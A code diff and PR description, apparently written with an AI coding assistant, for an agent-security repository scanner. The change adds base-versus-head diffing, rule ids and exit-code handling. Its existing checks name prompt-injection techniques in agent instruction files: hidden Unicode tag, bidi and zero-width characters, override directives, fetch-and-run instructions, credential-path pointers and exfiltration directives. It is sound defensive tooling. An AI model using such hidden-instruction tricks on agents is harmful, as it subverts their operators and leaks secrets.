       worstIntroduced: head.worst,
+      incomplete: true,
     };
   }
 
@@ -123,5 +124,8 @@ export function diffScans(base: ScanResult | null | undefined, head: ScanResult)
     unchanged,
     escalated,
     worstIntroduced: worstOf([...added.map((f) => f.severity), ...escalated.map((e) => e.to)]),
+    // The head side of the same guard: a scan that could not read every file has not
+    // earned the word "clean", however trustworthy the base was.
+    incomplete: head.incomplete,
   };
 }

--- a/src/ci-check/diff.ts
+++ b/src/ci-check/diff.ts
@@ -1,0 +1,127 @@
+// src/ci-check/diff.ts
+// CI-5 — classify a HEAD scan against a BASE scan: what did THIS change introduce?
+//
+// Every other check answers "what is wrong with this repo". A reviewer opening a pull
+// request is asking a different question, and answering the first one instead is why a
+// gate gets switched off on day one: a repo that has been accumulating agent config for
+// two years goes red on a PR that touched none of it.
+//
+// Pure and platform-agnostic on purpose. The identity of a finding is derived from repo
+// content ONLY (rule + path + a semantic locator) — never from a blob SHA, a PR number
+// or a run id, so it survives a rebase and ports to any host that can give us two trees.
+
+import { createHash } from 'node:crypto';
+import type {
+  BaseState,
+  CiFinding,
+  EscalatedFinding,
+  ScanDiff,
+  ScanResult,
+  Severity,
+} from './types';
+import { SEVERITY_RANK } from './types';
+
+/** The stable identity of a finding across two scans.
+ *
+ *  Deliberately EXCLUDES: severity and title (so a re-worded or re-graded finding is the
+ *  same finding), and the line number (which moves whenever anything above it is edited —
+ *  including it would report every finding in an edited file as new). */
+export function fingerprintOf(f: CiFinding): string {
+  const key = JSON.stringify([f.rule, f.file, f.locator ?? '', f.ordinal ?? 0]);
+  return createHash('sha256').update(key).digest('hex').slice(0, 16);
+}
+
+/** Assign `ordinal` to findings that are otherwise identical within one scan, so two
+ *  genuinely separate occurrences (the same hook command registered twice) do not collapse
+ *  into one key and silently drop from the diff. Mutates in emission order — deterministic
+ *  because the file order is. */
+export function assignOrdinals(findings: CiFinding[]): CiFinding[] {
+  const seen = new Map<string, number>();
+  for (const f of findings) {
+    const key = JSON.stringify([f.rule, f.file, f.locator ?? '']);
+    const n = seen.get(key) ?? 0;
+    if (n > 0) f.ordinal = n;
+    seen.set(key, n + 1);
+  }
+  return findings;
+}
+
+function worstOf(severities: Severity[]): Severity | null {
+  let worst: Severity | null = null;
+  for (const s of severities) {
+    if (!worst || SEVERITY_RANK[s] > SEVERITY_RANK[worst]) worst = s;
+  }
+  return worst;
+}
+
+/** Is the base side trustworthy enough to subtract from the head?
+ *
+ *  A base scan that could not read every file makes each unseen finding look introduced —
+ *  the mirror image of the failure this file exists to prevent. Both untrustworthy states
+ *  are named rather than collapsed into a boolean, so a consumer cannot mistake "we could
+ *  not compare" for "nothing new". */
+function baseStateOf(base: ScanResult | null | undefined): BaseState {
+  if (!base) return 'did-not-run';
+  return base.incomplete ? 'incomplete' : 'ok';
+}
+
+/**
+ * Classify `head` against `base`.
+ *
+ * When the base is not trustworthy the diff DEGRADES TO THE ABSOLUTE ANSWER: nothing is
+ * claimed as introduced, every head finding is reported, and `worstIntroduced` becomes the
+ * head's own worst severity. A caller that gates on `worstIntroduced` therefore gets the
+ * old, strict behaviour when the comparison was impossible — never a false all-clear.
+ */
+export function diffScans(base: ScanResult | null | undefined, head: ScanResult): ScanDiff {
+  const state = baseStateOf(base);
+
+  if (state !== 'ok' || !base) {
+    return {
+      base: state,
+      added: [],
+      removed: [],
+      unchanged: [...head.findings],
+      escalated: [],
+      worstIntroduced: head.worst,
+    };
+  }
+
+  const baseByFp = new Map<string, CiFinding>();
+  for (const f of base.findings) baseByFp.set(fingerprintOf(f), f);
+
+  const added: CiFinding[] = [];
+  const unchanged: CiFinding[] = [];
+  const escalated: EscalatedFinding[] = [];
+  const matched = new Set<string>();
+
+  for (const f of head.findings) {
+    const fp = fingerprintOf(f);
+    const prior = baseByFp.get(fp);
+    if (!prior) {
+      added.push(f);
+      continue;
+    }
+    matched.add(fp);
+    // A finding that already existed and got WORSE is guardrail erosion (a deny backstop
+    // deleted, a mitigation removed). It is not new, and calling it "unchanged" would let
+    // the removal merge silently — so it is its own class, and it counts as introduced.
+    if (SEVERITY_RANK[f.severity] > SEVERITY_RANK[prior.severity]) {
+      escalated.push({ finding: f, from: prior.severity, to: f.severity });
+    } else {
+      // Equal, or IMPROVED. A de-escalation is a fix in progress, never an introduction.
+      unchanged.push(f);
+    }
+  }
+
+  const removed = base.findings.filter((f) => !matched.has(fingerprintOf(f)));
+
+  return {
+    base: state,
+    added,
+    removed,
+    unchanged,
+    escalated,
+    worstIntroduced: worstOf([...added.map((f) => f.severity), ...escalated.map((e) => e.to)]),
+  };
+}

--- a/src/ci-check/fetch.ts
+++ b/src/ci-check/fetch.ts
@@ -382,6 +382,77 @@ export function readLocalTree(dir: string): RepoTree {
   return { source: root, files, notes };
 }
 
+/** Read the agent surface as it exists at a git REF, without touching the working tree.
+ *
+ *  CI-5's base side. `git ls-tree` + `git show` are read-only plumbing: no checkout, no
+ *  second worktree, no network — so scanning the base of a pull request costs one extra
+ *  process per surface file and cannot disturb whatever the caller has checked out.
+ *
+ *  Returns `null` when the ref cannot be resolved at all (not a git repo, unknown ref,
+ *  a shallow clone that does not contain the base commit). A null base is the
+ *  "did-not-run" state — the caller MUST NOT treat it as an empty/clean base, which
+ *  would report the whole repo as introduced. Selection mirrors `readLocalTree`
+ *  predicate-for-predicate so base and head can never disagree about WHAT was scanned. */
+export function readGitRefTree(dir: string, ref: string): RepoTree | null {
+  const root = dir.replace(/^~/, process.env.HOME ?? '~');
+  // A ref beginning with "-" would be read by git as a flag. Reject rather than sanitize.
+  if (!ref || ref.startsWith('-')) return null;
+
+  const git = (args: string[]): string | null => {
+    try {
+      return execFileSync('git', ['-C', root, ...args], {
+        encoding: 'utf8',
+        stdio: ['ignore', 'pipe', 'ignore'],
+        maxBuffer: 32 * 1024 * 1024,
+        timeout: 20000,
+      });
+    } catch {
+      return null;
+    }
+  };
+
+  // Resolve first: this is what separates "the base could not be read" from "the base
+  // genuinely had no agent surface". Only the former is did-not-run.
+  const sha = git(['rev-parse', '--verify', '--quiet', `${ref}^{commit}`])?.trim();
+  if (!sha) return null;
+  const listing = git(['ls-tree', '-r', '--name-only', '-z', sha]);
+  if (listing === null) return null;
+
+  const all = listing.split('\0').filter(Boolean);
+  const notes: string[] = [];
+  const files: RepoFile[] = [];
+  const seen = new Set<string>();
+  const present = new Set(all);
+
+  const add = (rel: string) => {
+    if (seen.has(rel) || !present.has(rel)) return;
+    seen.add(rel);
+    const content = git(['show', `${sha}:${rel}`]);
+    if (content !== null) files.push({ path: rel, content });
+  };
+
+  // Same order as readLocalTree: the fixed root surface first (never scan LESS than the
+  // old baseline), then nested matches, then root workflows.
+  for (const rel of SURFACE_FILES) add(rel);
+  const nested = all.filter((rel) => SURFACE_BASENAME.test(rel) && !isIgnoredDir(rel));
+  if (nested.length > MAX_SURFACE_FILES) {
+    notes.push(
+      `repo is large — some agent-surface files may be INCOMPLETE (capped at ${MAX_SURFACE_FILES} files).`
+    );
+  }
+  for (const rel of nested.slice(0, MAX_SURFACE_FILES)) add(rel);
+  for (const rel of all) {
+    if (
+      rel.startsWith(`${WORKFLOW_DIR}/`) &&
+      /\.ya?ml$/.test(rel) &&
+      !rel.slice(WORKFLOW_DIR.length + 1).includes('/')
+    )
+      add(rel);
+  }
+
+  return { source: `${root}@${ref}`, files, notes };
+}
+
 /** Resolve any input (URL | owner/repo | local path) to a RepoTree. */
 export async function fetchTree(input: string, onProgress?: OnProgress): Promise<RepoTree> {
   if (isLocalPath(input)) return readLocalTree(input);

--- a/src/ci-check/index.ts
+++ b/src/ci-check/index.ts
@@ -9,6 +9,7 @@ import { analyzeAgentConfig } from './agent-config';
 import { analyzeMcp } from './mcp';
 import { analyzeCodexConfig } from './codex';
 import { analyzeInstructionFile } from './instructions';
+import { assignOrdinals } from './diff';
 import type { CiFinding, ScanResult, Severity, RepoTree } from './types';
 import { SEVERITY_RANK } from './types';
 
@@ -53,6 +54,10 @@ export function scanTree(tree: RepoTree): ScanResult {
       notes.push(`checker degraded on ${file.path}: ${(err as Error)?.message ?? 'error'}`);
     }
   }
+
+  // Identity before sorting: ordinals are assigned in EMISSION order so two otherwise
+  // identical findings in one file keep distinct, stable identities across scans.
+  assignOrdinals(findings);
 
   // Worst-first, then by file for stable output.
   findings.sort(

--- a/src/ci-check/instructions.ts
+++ b/src/ci-check/instructions.ts
@@ -114,13 +114,24 @@ function decodeSuspiciousBase64(text: string): string {
 }
 
 function mk(
+  rule: string,
   severity: Severity,
   title: string,
   signals: string[],
   fix: string,
   path: string
 ): CiFinding {
-  return { check: 'CI-6', dimension: 'instructions', severity, title, file: path, signals, fix };
+  // Every CI-6 signal fires at most once per file, so the rule id alone locates it.
+  return {
+    check: 'CI-6',
+    rule,
+    dimension: 'instructions',
+    severity,
+    title,
+    file: path,
+    signals,
+    fix,
+  };
 }
 
 /** Analyze one agent instruction file. Returns 0+ findings. Never throws. */
@@ -132,6 +143,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   if (TAG_CHARS.test(content))
     findings.push(
       mk(
+        'CI-6.unicode-tag-chars',
         'critical',
         'Unicode tag characters in an agent instruction file',
         [
@@ -144,6 +156,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   if (BIDI_OVERRIDE.test(content))
     findings.push(
       mk(
+        'CI-6.bidi-override',
         'critical',
         'Bidirectional override characters in an agent instruction file',
         [
@@ -156,6 +169,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   else if (BIDI_EMBED_ISOLATE.test(content))
     findings.push(
       mk(
+        'CI-6.bidi-formatting',
         'advisory',
         'Bidirectional formatting characters in an agent instruction file',
         [
@@ -170,6 +184,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
     const revealed = OVERRIDE_RE.test(stripZeroWidth(content)) && !OVERRIDE_RE.test(content);
     findings.push(
       mk(
+        'CI-6.zero-width',
         revealed ? 'critical' : 'medium',
         'Zero-width characters splitting text in an agent instruction file',
         [
@@ -188,6 +203,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
     const m = (ov || ovEnc)!;
     findings.push(
       mk(
+        'CI-6.prompt-override',
         ovEnc ? 'critical' : 'high',
         'Prompt-override directive in an agent instruction file',
         [
@@ -204,6 +220,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   if (fo && !inHumanSection(content, fo.index) && !isNegated(content, fo.index)) {
     findings.push(
       mk(
+        'CI-6.fetch-and-obey',
         'medium',
         'Instruction directs the agent to fetch and run remote code',
         [`\`${fo[0].slice(0, 70).trim()}\` — fetch-and-obey, outside an install/setup section`],
@@ -216,6 +233,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   if (sp && !isNegated(content, sp.index)) {
     findings.push(
       mk(
+        'CI-6.secret-path',
         'medium',
         'Instruction points the agent at credential material',
         [`references \`${sp[0].slice(0, 50).trim()}\` — directs the agent toward secrets`],
@@ -228,6 +246,7 @@ export function analyzeInstructionFile(path: string, content: string): CiFinding
   if (ex && !inHumanSection(content, ex.index) && !isNegated(content, ex.index)) {
     findings.push(
       mk(
+        'CI-6.exfil-directive',
         'medium',
         'Instruction directs the agent to send data to an external endpoint',
         [`\`${ex[0].slice(0, 70).trim()}\` — possible exfiltration directive`],

--- a/src/ci-check/mcp.ts
+++ b/src/ci-check/mcp.ts
@@ -40,6 +40,8 @@ export function analyzeMcpServers(
     if (/\bnpx\b/.test(argv) && (/@latest\b/.test(argv) || !/@\d/.test(argv))) {
       findings.push({
         check: 'CI-3',
+        rule: 'CI-3.mcp-unpinned',
+        locator: name,
         dimension: 'mcp',
         severity: 'medium',
         title: `MCP server "${name}" runs an unpinned executable`,
@@ -56,6 +58,8 @@ export function analyzeMcpServers(
       if (hit) {
         findings.push({
           check: 'CI-3',
+          rule: 'CI-3.mcp-inline-credential',
+          locator: `${name}.env.${k}`,
           dimension: 'mcp',
           severity: 'high',
           title: `MCP server "${name}" has an inline credential`,

--- a/src/ci-check/render.ts
+++ b/src/ci-check/render.ts
@@ -4,7 +4,7 @@
 // finding shows the signals that fired AND the mitigations seen.
 
 import chalk from 'chalk';
-import type { ScanResult, CiFinding, Severity } from './types';
+import type { ScanResult, CiFinding, ScanDiff, Severity } from './types';
 
 const ICON: Record<Severity, string> = {
   critical: '🔴',
@@ -77,7 +77,27 @@ function ownedHint(source: string): boolean {
   return source.startsWith('/') || source.startsWith('.') || source.startsWith('~');
 }
 
-export function renderScan(res: ScanResult): string {
+/** One finding, as Markdown. Shared by the absolute and the diff renderers so the two can
+ *  never drift in how a finding reads. */
+function findingMd(f: CiFinding, L: string[]): void {
+  L.push(`**${ICON[f.severity]} ${f.severity.toUpperCase()} — ${f.title}**`);
+  L.push(`\`${f.file}${f.line ? ':' + f.line : ''}\`  ·  ${f.rule}`);
+  L.push('');
+  for (const s of f.signals) L.push(`- ${s}`);
+  if (f.mitigations?.length) L.push(`- _mitigated:_ ${f.mitigations.join('; ')}`);
+  L.push('');
+  L.push(`→ **Fix:** ${f.fix}`);
+  L.push('');
+}
+
+/** Why a diff could not be trusted, in the reviewer's words. Never rendered as "clean". */
+function baseWarning(base: ScanDiff['base']): string {
+  return base === 'did-not-run'
+    ? '⚠️ **Could not read the base commit**, so nothing below can be called "new" — every finding in this repo is listed. (A shallow clone is the usual cause: fetch the base ref.)'
+    : '⚠️ **The base scan could not read every file**, so a finding missing from it would look new. Every finding in this repo is listed instead.';
+}
+
+export function renderScan(res: ScanResult, diff?: ScanDiff): string {
   const L: string[] = [];
   const n = res.findings.length;
   // An incomplete scan (rate limit / network) can never be "clean" — it didn't
@@ -92,6 +112,27 @@ export function renderScan(res: ScanResult): string {
           : chalk.green('✅ agent-security: clean');
   L.push(`🛡️  ${chalk.bold('node9 scan-repo')}  ·  ${res.source}  ·  ${head}`);
   L.push(chalk.gray(`   inspected ${res.inspected.length} config file(s), ${n} finding(s)`));
+  if (diff) {
+    const introduced = diff.added.length + diff.escalated.length;
+    L.push(
+      diff.base !== 'ok'
+        ? chalk.yellow.bold(
+            `   ⚠️  base ${diff.base === 'did-not-run' ? 'could not be read' : 'scan was incomplete'} — cannot say what is new; showing everything`
+          )
+        : introduced > 0
+          ? chalk.red.bold(
+              `   ⚠️  this change introduced ${introduced} finding(s)` +
+                (diff.escalated.length
+                  ? ` (${diff.escalated.length} by widening an existing one)`
+                  : '')
+            )
+          : chalk.green(
+              `   ✅ this change introduced nothing` +
+                (diff.unchanged.length ? ` (${diff.unchanged.length} pre-existing)` : '') +
+                (diff.removed.length ? `, and fixed ${diff.removed.length}` : '')
+            )
+    );
+  }
   if (res.incomplete) {
     // State the ACTUAL cause — a rate limit and a network timeout need different
     // advice (a token fixes the former, not the latter).
@@ -144,7 +185,7 @@ export function renderScan(res: ScanResult): string {
   return L.join('\n');
 }
 
-export function renderScanMarkdown(res: ScanResult): string {
+export function renderScanMarkdown(res: ScanResult, diff?: ScanDiff): string {
   const L: string[] = [];
   const status =
     res.worst === 'critical' || res.worst === 'high'
@@ -160,16 +201,50 @@ export function renderScanMarkdown(res: ScanResult): string {
     `Inspected ${res.inspected.length} config file(s) · **${res.findings.length} finding(s)**`
   );
   L.push('');
-  for (const f of res.findings) {
-    L.push(`**${ICON[f.severity]} ${f.severity.toUpperCase()} — ${f.title}**`);
-    L.push(`\`${f.file}${f.line ? ':' + f.line : ''}\` · ${f.check}`);
-    L.push('');
-    for (const s of f.signals) L.push(`- ${s}`);
-    if (f.mitigations?.length) L.push(`- _mitigated:_ ${f.mitigations.join('; ')}`);
-    L.push('');
-    L.push(`→ **Fix:** ${f.fix}`);
+  // CI-5: lead with what THIS change is answerable for. A reviewer cannot act on a repo's
+  // accumulated history, and burying the one new finding under twelve old ones is how a
+  // gate gets muted. Pre-existing findings stay in the comment — collapsed, not deleted.
+  if (diff && diff.base === 'ok') {
+    const introduced = [...diff.added, ...diff.escalated.map((e) => e.finding)];
+    if (introduced.length === 0) {
+      L.push(
+        `✅ **This change introduces no agent-security findings.**` +
+          (diff.removed.length ? ` It also fixes ${diff.removed.length}.` : '')
+      );
+      L.push('');
+    } else {
+      L.push(`#### ⚠️ Introduced by this change — ${introduced.length} finding(s)`);
+      L.push('');
+      for (const f of diff.added) findingMd(f, L);
+      for (const e of diff.escalated) {
+        L.push(
+          `> _Guardrail erosion: this finding already existed at **${e.from}** and this change widens it to **${e.to}**._`
+        );
+        L.push('');
+        findingMd(e.finding, L);
+      }
+    }
+    if (diff.removed.length) {
+      L.push(`✅ Fixed by this change: ${diff.removed.length} finding(s).`);
+      L.push('');
+    }
+    if (diff.unchanged.length) {
+      L.push(
+        `<details><summary>${diff.unchanged.length} pre-existing finding(s) — not introduced by this change</summary>`
+      );
+      L.push('');
+      for (const f of diff.unchanged) findingMd(f, L);
+      L.push('</details>');
+      L.push('');
+    }
+    return L.join('\n');
+  }
+
+  if (diff) {
+    L.push(baseWarning(diff.base));
     L.push('');
   }
+  for (const f of res.findings) findingMd(f, L);
   if (res.findings.length === 0) L.push('No committed agent-security issues found.');
   // NOTE: intentionally NO Action CTA here. This renders the PR comment posted
   // BY the Action itself — if it's commenting, the Action is already installed,

--- a/src/ci-check/render.ts
+++ b/src/ci-check/render.ts
@@ -252,12 +252,19 @@ export function renderScanMarkdown(res: ScanResult, diff?: ScanDiff): string {
   return L.join('\n');
 }
 
+/** The CLI's one exit-code law, in terms of a severity + whether the scan finished.
+ *  Shared by the absolute gate and the `--fail-on-introduced` gate so the same severity
+ *  can never block on one and pass on the other. */
+export function exitCodeForSeverity(worst: Severity | null, incomplete: boolean): number {
+  if (worst === 'critical' || worst === 'high') return 2;
+  if (worst === 'medium') return 1;
+  if (incomplete) return 3; // couldn't read every file — not a clean pass
+  return 0;
+}
+
 /** Shared by the CLI: pick a picked finding's exit code weight. */
 export function exitCodeFor(res: ScanResult): number {
-  if (res.worst === 'critical' || res.worst === 'high') return 2;
-  if (res.worst === 'medium') return 1;
-  if (res.incomplete) return 3; // couldn't read every file — not a clean pass
-  return 0;
+  return exitCodeForSeverity(res.worst, res.incomplete);
 }
 
 export function pickFinding(findings: CiFinding[]): CiFinding | undefined {

--- a/src/ci-check/types.ts
+++ b/src/ci-check/types.ts
@@ -75,6 +75,11 @@ export interface ScanDiff {
    *  `escalated` when the base is trustworthy; the HEAD's absolute worst otherwise, so a
    *  base that could not run can never be rendered as "nothing new". */
   worstIntroduced: Severity | null;
+  /** True when EITHER side could not read every file. A severity cannot express "we did
+   *  not finish looking" — `worstIntroduced: null` on an incomplete scan is a statement
+   *  about what we read, not about the change — so the third state is carried separately
+   *  and no consumer may render an incomplete diff as a pass. */
+  incomplete: boolean;
 }
 
 /** A fetched agent-surface file. `content` is the raw text (never executed). */

--- a/src/ci-check/types.ts
+++ b/src/ci-check/types.ts
@@ -17,6 +17,11 @@ export type Dimension = 'workflows' | 'toolRules' | 'mcp' | 'data' | 'files' | '
 export interface CiFinding {
   /** Which check produced it, e.g. 'CI-2'. */
   check: string;
+  /** Stable rule id, e.g. 'CI-3.mcp-unpinned'. Unlike `check` this is granular enough
+   *  to identify ONE finding kind, and unlike `title` it never changes with severity or
+   *  wording — so it is the half of the identity that survives a rewrite of the copy.
+   *  CI-5 diffing, suppression and any external report format key off this. */
+  rule: string;
   dimension: Dimension;
   severity: Severity;
   /** One-line headline naming the exposure, e.g.
@@ -32,6 +37,44 @@ export interface CiFinding {
   mitigations?: string[];
   /** The concrete fix. */
   fix: string;
+  /** What this finding points at WITHIN the file — an MCP server name, a hook command.
+   *  Empty for a file-level finding (one per file). Together with `rule` and `file` this
+   *  is the finding's identity across two scans. MUST be derived from repo content only:
+   *  a blob SHA, a PR number or a run id would break the identity on rebase and would not
+   *  port to a non-GitHub host. */
+  locator?: string;
+  /** Disambiguates two findings that are otherwise identical within one file (e.g. the
+   *  same hook command registered twice). 0 for the first occurrence; assigned by the
+   *  scan, never by a check. */
+  ordinal?: number;
+}
+
+/** How one finding relates to the base scan. `escalated` is a finding that already
+ *  existed and got WORSE — guardrail erosion, which is the thing CI-5 was designed to
+ *  catch and which neither `added` nor `unchanged` describes. */
+export type DiffStatus = 'added' | 'removed' | 'unchanged' | 'escalated';
+
+export interface EscalatedFinding {
+  finding: CiFinding;
+  from: Severity;
+  to: Severity;
+}
+
+/** Whether the base side of a diff is trustworthy. `incomplete` (the base scan ran but
+ *  could not read every file) and `did-not-run` are NOT the same as a clean base: both
+ *  make every unseen finding look introduced, so both degrade to the absolute answer. */
+export type BaseState = 'ok' | 'incomplete' | 'did-not-run';
+
+export interface ScanDiff {
+  base: BaseState;
+  added: CiFinding[];
+  removed: CiFinding[];
+  unchanged: CiFinding[];
+  escalated: EscalatedFinding[];
+  /** Worst severity this PR is answerable for — the gate input. Worst of `added` +
+   *  `escalated` when the base is trustworthy; the HEAD's absolute worst otherwise, so a
+   *  base that could not run can never be rendered as "nothing new". */
+  worstIntroduced: Severity | null;
 }
 
 /** A fetched agent-surface file. `content` is the raw text (never executed). */

--- a/src/ci-check/workflows.ts
+++ b/src/ci-check/workflows.ts
@@ -777,6 +777,8 @@ export function analyzeWorkflow(path: string, content: string): CiFinding | null
 
   return {
     check: 'CI-2',
+    // One verdict per workflow file — the finding IS the file's reachability score.
+    rule: 'CI-2.injectable-workflow',
     dimension: 'workflows',
     severity,
     title,
@@ -958,6 +960,7 @@ export function analyzeWorkflowSecrets(path: string, content: string): CiFinding
 
   return {
     check: 'CI-4',
+    rule: 'CI-4.agent-reachable-secret',
     dimension: 'data',
     severity: worst.severity,
     title:

--- a/src/cli/commands/scan-repo.ts
+++ b/src/cli/commands/scan-repo.ts
@@ -11,8 +11,13 @@ import chalk from 'chalk';
 import { scanRepo, scanTree, type OnProgress } from '../../ci-check';
 import { readGitRefTree } from '../../ci-check/fetch';
 import { diffScans } from '../../ci-check/diff';
-import { renderScan, renderScanMarkdown, exitCodeFor } from '../../ci-check/render';
-import { SEVERITY_RANK, type ScanDiff } from '../../ci-check/types';
+import {
+  renderScan,
+  renderScanMarkdown,
+  exitCodeFor,
+  exitCodeForSeverity,
+} from '../../ci-check/render';
+import type { ScanDiff } from '../../ci-check/types';
 
 const SPIN = ['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏'];
 
@@ -86,14 +91,14 @@ export function registerScanRepoCommand(program: Command): void {
         }
 
         // Non-zero when a real risk is present, so CI/scripts can gate. `--fail-on-introduced`
-        // narrows that to what this change is answerable for, which is what makes the gate
-        // adoptable on a repo that is already dirty. When the base could not be read,
-        // `worstIntroduced` already carries the absolute worst, so the gate stays strict.
+        // narrows WHICH findings are judged; it does not change the severity policy, so it
+        // runs through the same exit-code law — a medium blocks (or does not) identically
+        // either way. `incomplete` is carried through: a scan that could not read every
+        // file still exits 3, because "nothing introduced" would then be a statement about
+        // what we read rather than about the change.
         process.exitCode =
           opts.failOnIntroduced && diff
-            ? diff.worstIntroduced && SEVERITY_RANK[diff.worstIntroduced] >= SEVERITY_RANK.high
-              ? 1
-              : 0
+            ? exitCodeForSeverity(diff.worstIntroduced, diff.incomplete)
             : exitCodeFor(res);
       }
     );

--- a/src/cli/commands/scan-repo.ts
+++ b/src/cli/commands/scan-repo.ts
@@ -8,8 +8,11 @@
 
 import type { Command } from 'commander';
 import chalk from 'chalk';
-import { scanRepo, type OnProgress } from '../../ci-check';
+import { scanRepo, scanTree, type OnProgress } from '../../ci-check';
+import { readGitRefTree } from '../../ci-check/fetch';
+import { diffScans } from '../../ci-check/diff';
 import { renderScan, renderScanMarkdown, exitCodeFor } from '../../ci-check/render';
+import { SEVERITY_RANK, type ScanDiff } from '../../ci-check/types';
 
 const SPIN = ['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏'];
 
@@ -44,22 +47,54 @@ export function registerScanRepoCommand(program: Command): void {
     .description("Scan a repo's agent-security surface (GitHub URL or local path)")
     .option('--json', 'emit the raw result as JSON')
     .option('--markdown', 'emit a Markdown report (for a PR comment)')
-    .action(async (target: string, opts: { json?: boolean; markdown?: boolean }) => {
-      const { onProgress, done } = makeProgress(target, !!(opts.json || opts.markdown));
-      let res;
-      try {
-        res = await scanRepo(target, onProgress);
-      } finally {
-        done();
+    .option(
+      '--base <ref>',
+      'also scan this git ref and report what the working tree INTRODUCED (local path targets only)'
+    )
+    .option(
+      '--fail-on-introduced',
+      'exit non-zero only for findings this change introduced (requires --base)'
+    )
+    .action(
+      async (
+        target: string,
+        opts: { json?: boolean; markdown?: boolean; base?: string; failOnIntroduced?: boolean }
+      ) => {
+        const { onProgress, done } = makeProgress(target, !!(opts.json || opts.markdown));
+        let res;
+        try {
+          res = await scanRepo(target, onProgress);
+        } finally {
+          done();
+        }
+
+        // CI-5: what did THIS change introduce? A base tree that cannot be read yields a
+        // null base, which `diffScans` degrades to the absolute answer — never to a
+        // false "nothing new".
+        let diff: ScanDiff | undefined;
+        if (opts.base) {
+          const baseTree = readGitRefTree(target, opts.base);
+          diff = diffScans(baseTree ? scanTree(baseTree) : null, res);
+        }
+
+        if (opts.json) {
+          console.log(JSON.stringify(diff ? { ...res, diff } : res, null, 2));
+        } else if (opts.markdown) {
+          console.log(renderScanMarkdown(res, diff));
+        } else {
+          console.log(renderScan(res, diff));
+        }
+
+        // Non-zero when a real risk is present, so CI/scripts can gate. `--fail-on-introduced`
+        // narrows that to what this change is answerable for, which is what makes the gate
+        // adoptable on a repo that is already dirty. When the base could not be read,
+        // `worstIntroduced` already carries the absolute worst, so the gate stays strict.
+        process.exitCode =
+          opts.failOnIntroduced && diff
+            ? diff.worstIntroduced && SEVERITY_RANK[diff.worstIntroduced] >= SEVERITY_RANK.high
+              ? 1
+              : 0
+            : exitCodeFor(res);
       }
-      if (opts.json) {
-        console.log(JSON.stringify(res, null, 2));
-      } else if (opts.markdown) {
-        console.log(renderScanMarkdown(res));
-      } else {
-        console.log(renderScan(res));
-      }
-      // Non-zero when a real risk is present, so CI/scripts can gate.
-      process.exitCode = exitCodeFor(res);
-    });
+    );
 }


### PR DESCRIPTION
## Why

Every scan today is absolute: it grades a repository's current state. A reviewer opening a pull request is asking a different question, and answering the first one instead is why the gate gets switched off on day one — a repo that has been accumulating agent config for two years goes red on a PR that touched none of it.

Measured on a real git repo with a real base commit:

| scenario | today | with this PR |
|---|---|---|
| dirty repo (pre-existing critical), PR changes nothing | blocked, exit 1 | **passes**, exit 0 |
| PR adds an injectable workflow | blocked | blocked |
| base commit unreadable | n/a | blocked, and says why |

## What

**Finding identity.** `CiFinding.rule` is a stable per-finding id (`CI-3.mcp-unpinned`) — granular where `check` is coarse, fixed where `title` and `severity` move. `locator` says what the finding points at inside the file (an MCP server name, a hook command); `ordinal` separates two genuinely identical findings in one file. Identity is derived from **repo content only** — never a blob SHA, a PR number or a run id — so it survives a rebase and ports to a non-GitHub host.

**The diff.** `diffScans()` classifies head against base as added / removed / unchanged / **escalated**. Escalation is its own class because a finding that already existed and got worse (a `deny` backstop deleted) is guardrail erosion — calling it "unchanged" would let the removal merge silently.

**The base side.** `readGitRefTree()` reads the base surface with `git ls-tree` + `git show`. No checkout, no second worktree, no network, and it cannot disturb whatever the caller has checked out. Selection mirrors `readLocalTree` predicate-for-predicate so the two sides can never disagree about what was scanned.

**Surfaces.** `scan-repo --base <ref>` / `--fail-on-introduced`; Action inputs `fail-on-scope: all|introduced` (default `all`) and `annotate`. Inline annotations are workflow commands on stdout — no API call, no `checks: write`, works on a private repo with no licence.

## The failure this is built against

A base that cannot be read is modelled as three states, not two: `ok` / `incomplete` / `did-not-run`. Both untrustworthy states degrade to the absolute answer, so an unreadable base can never render as "nothing new".

The review pass caught that I had guarded only the base side — an **incomplete head** scan reported a clean pass on the narrow gate while the absolute path correctly exits 3. Fixed in 75ece40: `ScanDiff.incomplete` travels beside the severity, the check-run goes `neutral` rather than `success`, and the comment cannot take its green branch.

## Compatibility

`fail-on-scope` defaults to `all` — byte-for-byte the previous behaviour for anyone on `@v2`. An older CLI that emits no `diff` falls back to the strict gate rather than opening it (covered by selftest).

## Verification

- Corpus written **before** the implementation; every load-bearing assertion mutation-tested (severity in the fingerprint, escalation as unchanged, "nothing new" on an untrustworthy base, dropped ordinals, dropped incomplete flag — each turns a test red).
- Full suite green through the pre-commit hook: format, typecheck, lint, 4,600 tests.
- Real end-to-end run of the built `dist/cli.js` against a git repo with a real base commit, plus `comment.js` driven by that CLI's actual JSON.

## Known limits, stated

- **No finding carries a line number today** — `CiFinding.line` exists and no check populates it. Annotations therefore anchor at the file (line 1). Adding line tracking to the checks upgrades them in place with no change here.
- A file rename reads as remove + add. Deliberate for v1, and tested as such.
- Also drops a README overclaim found while verifying coverage: CI-6 does not scan skills.

🤖 Generated with [Claude Code](https://claude.com/claude-code)